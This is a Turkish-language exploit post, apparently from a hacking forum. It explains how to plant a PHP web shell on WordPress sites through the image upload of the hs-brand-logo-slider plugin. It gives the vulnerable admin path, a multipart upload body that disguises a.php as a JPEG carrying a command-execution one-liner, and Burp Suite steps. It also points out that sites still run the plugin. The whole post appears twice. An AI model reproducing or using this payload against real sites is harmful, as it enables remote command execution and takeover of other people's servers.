Wordpress banner image upload üzerinden shell atma. Efsane bir zafiyet ve exploit
# Exploit Author: Net-Hunter
# Google Dork: N/A
# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
Zafiyetli olduğu için github linki disabled fakat hala kullanan siteler var.
Evet arkadaşlar wp banner image upload alanında shell atmayı bulmuşlar.
Sağlam bir zafiyet şimdi kullanımına geçelim.
Açıklı dosya dizinimiz;
"" /wp-admin/admin.php?page=hs-brand-logo-slider.php ""
Bu yazılımdaki Açıklı dosya dizinimiz.
Zafiyet ve kullanımı:
Content-Disposition: form-data; name="logoupload"; filename="a.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?>
Detaylı PoC:
1- Hesabınızla bu yazılıma giriş yapıyorsunuz.
2- Burp Suite üzerinden image upload ederken Forward yapıp resim.jpg yi resim.php (shell)
olarak güncelliyorsunuz.
3- Shellimiz atıldı...
# Exploit Author: Net-Hunter
# Google Dork: N/A
# Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/
Zafiyetli olduğu için github linki disabled fakat hala kullanan siteler var.
Evet arkadaşlar wp banner image upload alanında shell atmayı bulmuşlar.
Sağlam bir zafiyet şimdi kullanımına geçelim.
Açıklı dosya dizinimiz;
"" /wp-admin/admin.php?page=hs-brand-logo-slider.php ""
Bu yazılımdaki Açıklı dosya dizinimiz.
Zafiyet ve kullanımı:
Content-Disposition: form-data; name="logoupload"; filename="a.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?>
Detaylı PoC:
1- Hesabınızla bu yazılıma giriş yapıyorsunuz.
2- Burp Suite üzerinden image upload ederken Forward yapıp resim.jpg yi resim.php (shell)
olarak güncelliyorsunuz.
3- Shellimiz atıldı...

